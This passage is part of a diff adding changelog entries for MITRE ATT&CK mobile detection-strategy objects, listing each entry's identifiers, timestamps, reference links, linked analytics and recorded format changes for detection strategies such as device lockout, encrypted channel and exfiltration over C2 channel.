+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3f3f3518-90bb-44fc-8ef0-dbfab75b79cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0630",
+                            "external_id": "DET0630"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Device Administrator Permissions",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6852479f-7c3d-4c69-82b9-b5b9976e4101"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3115adee-e3f8-498a-9bb2-47983e404ce8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0603",
+                            "external_id": "DET0603"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Device Lockout",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a5c4230b-7064-4863-9a60-e0565042d452"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0d03e753-a278-4a32-a33f-6199967220de",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0693",
+                            "external_id": "DET0693"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Disable or Modify Tools",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--75eaee42-f7b5-4792-9611-74626bd98838"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0f41110f-099f-468f-af46-65d2a34f05d9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0710",
+                            "external_id": "DET0710"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Disguise Root/Jailbreak Indicators",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b6618b3a-370c-44af-86db-d4640799ed6e",
+                        "x-mitre-analytic--0b0e244e-9386-4520-b030-9e330c6c1930"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bd3d39c3-e5d5-4ce7-9e1b-1b9598352dc5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0669",
+                            "external_id": "DET0669"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Domain Generation Algorithms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a088cd64-106e-4fe2-a004-5796c574cfd0",
+                        "x-mitre-analytic--4cb75669-f88d-4374-be51-e4b99e22b64e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--996f14f4-3419-45f6-af22-edc15f5d5d19",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0618",
+                            "external_id": "DET0618"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Download New Code at Runtime",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7b4c77fd-f350-48ec-abce-aac3e35c939f",
+                        "x-mitre-analytic--b6d9d5a1-5966-4888-b4ce-30b125043c4d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c6c7da3e-4366-473e-af4e-3cc67d8ea1fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0614",
+                            "external_id": "DET0614"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Drive-By Compromise",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3723c7a3-2ea7-455f-aec5-29300cb7ae64",
+                        "x-mitre-analytic--de37eb78-5f35-4327-99d0-ad6546ab0fb6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1147c50d-907a-4c0d-8375-e23cadeae5f9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0613",
+                            "external_id": "DET0613"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Dynamic Resolution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--729a7413-3c5b-4637-a97b-9bba9f7734a7",
+                        "x-mitre-analytic--c56cfd62-b8cb-49be-820b-e447a1605106"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6e373a06-358b-4078-a8ab-1f5c1730ddf4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0641",
+                            "external_id": "DET0641"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Encrypted Channel",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f3068304-de28-4efa-96a5-a360fc7ffc97",
+                        "x-mitre-analytic--369938c8-6b9e-4eb3-8105-eb76a373dc35"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bc10fb75-db07-4ace-843c-8bcfd4044a90",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0627",
+                            "external_id": "DET0627"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Endpoint Denial of Service",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e1db1813-109f-4f24-87e3-5d7b5e506dd3",
+                        "x-mitre-analytic--4a7169fa-79d4-4724-ad55-6e9842b7cb94"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ffbbeee2-1138-4743-905d-e2d605d00ecb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0647",
+                            "external_id": "DET0647"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Event Triggered Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0d22c60c-fd0b-47f8-abe4-2d661a73c653"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--80e1ef21-9454-4000-ae75-d7a5ae8e703b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0653",
+                            "external_id": "DET0653"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Execution Guardrails",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--31d95dc7-aec7-47a2-bbb4-8b20ca3bc184",
+                        "x-mitre-analytic--28304317-cbde-45cd-bf0b-99b5cd8d1478"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7f914be4-061a-43a7-8d36-a758b123ca3b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0698",
+                            "external_id": "DET0698"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exfiltration Over Alternative Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f42dbde8-e7a0-41ed-b13c-7ade678fa782",
+                        "x-mitre-analytic--114cd15c-a02f-4bac-8ed3-3ae71c1761ec"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3ead6ecd-8ecb-40c9-8a73-ee3272bf0deb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0615",
+                            "external_id": "DET0615"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exfiltration Over C2 Channel",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6a60d1be-ab95-46d2-91a7-01703553090e",
+                        "x-mitre-analytic--413bdb56-913d-42e0-978e-5a48c60f562e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c1ca9729-d9a0-47fd-98bf-8355ee9fc8e2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0701",
+                            "external_id": "DET0701"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exfiltration Over Unencrypted Non-C2 Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ece5746f-194b-4564-9f5f-7ebf3b23542e",
+                        "x-mitre-analytic--111bf5b3-ce1c-4f60-b1b0-deef85fc6a0a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--06aad19e-a382-4987-a73c-a8e5c340d657",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0629",
+                            "external_id": "DET0629"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploitation for Client Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9a574586-2729-4e60-8e60-5e07f200c3ff",
+                        "x-mitre-analytic--71fc481d-53f9-4a35-9879-e01e17f425f0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1cabf349-a457-422b-a179-475795013f8a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0666",
+                            "external_id": "DET0666"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploitation for Initial Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3307605e-f2ac-4cfb-be12-5d880e1bfa11",
+                        "x-mitre-analytic--79897090-662d-4118-b73a-145f79e31829"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5d42f7a1-78dd-4569-936e-78fe4601cb73",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0665",
+                            "external_id": "DET0665"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploitation for Privilege Escalation",
